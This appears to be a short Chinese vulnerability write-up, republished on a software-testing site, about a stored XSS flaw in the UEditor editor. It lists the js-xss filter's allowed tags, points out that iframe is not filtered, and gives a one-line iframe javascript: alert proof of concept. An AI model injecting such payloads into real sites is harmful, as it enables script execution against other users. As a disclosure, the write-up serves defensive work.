UEditor储存型xss漏洞

发表于:2017-9-22 17:31

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:小雨    来源:51Testing软件测试网采编

  xss过滤的名单:
  https://raw.githubusercontent.com/leizongmin/js-xss/master/lib/default.js
  a:      ['target', 'href', 'title', 'class', 'style'],
  abbr:   ['title', 'class', 'style'],
  address: ['class', 'style'],
  area:   ['shape', 'coords', 'href', 'alt'],
  article: [],
  aside:  [],
  audio:  ['autoplay', 'controls', 'loop', 'preload', 'src', 'class', 'style'],
  b:      ['class', 'style'],
  bdi:    ['dir'],
  bdo:    ['dir'],
  big:    [],
  blockquote: ['cite', 'class', 'style'],
  br:     [],
  caption: ['class', 'style'],
  center: [],
  cite:   [],
  code:   ['class', 'style'],
  col:    ['align', 'valign', 'span', 'width', 'class', 'style'],
  colgroup: ['align', 'valign', 'span', 'width', 'class', 'style'],
  dd:     ['class', 'style'],
  del:    ['datetime'],
  details: ['open'],
  div:    ['class', 'style'],
  dl:     ['class', 'style'],
  dt:     ['class', 'style'],
  em:     ['class', 'style'],
  font:   ['color', 'size', 'face'],
  footer: [],
  h1:     ['class', 'style'],
  h2:     ['class', 'style'],
  h3:     ['class', 'style'],
  h4:     ['class', 'style'],
  h5:     ['class', 'style'],
  h6:     ['class', 'style'],
  header: [],
  hr:     [],
  i:      ['class', 'style'],
  img:    ['src', 'alt', 'title', 'width', 'height', 'id', '_src', 'loadingclass', 'class', 'data-latex'],
  ins:    ['datetime'],
  li:     ['class', 'style'],
  mark:   [],
  nav:    [],
  ol:     ['class', 'style'],
  p:      ['class', 'style'],
  pre:    ['class', 'style'],
  s:      [],
  section:[],
  small:  [],
  span:   ['class', 'style'],
  sub:    ['class', 'style'],
  sup:    ['class', 'style'],
  strong: ['class', 'style'],
  table:  ['width', 'border', 'align', 'valign', 'class', 'style'],
  tbody:  ['align', 'valign', 'class', 'style'],
  td:     ['width', 'rowspan', 'colspan', 'align', 'valign', 'class', 'style'],
  tfoot:  ['align', 'valign', 'class', 'style'],
  th:     ['width', 'rowspan', 'colspan', 'align', 'valign', 'class', 'style'],
  thead:  ['align', 'valign', 'class', 'style'],
  tr:     ['rowspan', 'align', 'valign', 'class', 'style'],
  tt:     [],
  u:      [],
  ul:     ['class', 'style'],
  video:  ['autoplay', 'controls', 'loop', 'preload', 'src', 'height', 'width', 'class', 'style']
  没有过滤iframe标签
  poc: <iframe src=”javascript:alert(1)”></iframe>
  html源码
  插入poc
  反回编辑器弹出xss
  看出源码没有过滤
  百度已经修复:
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号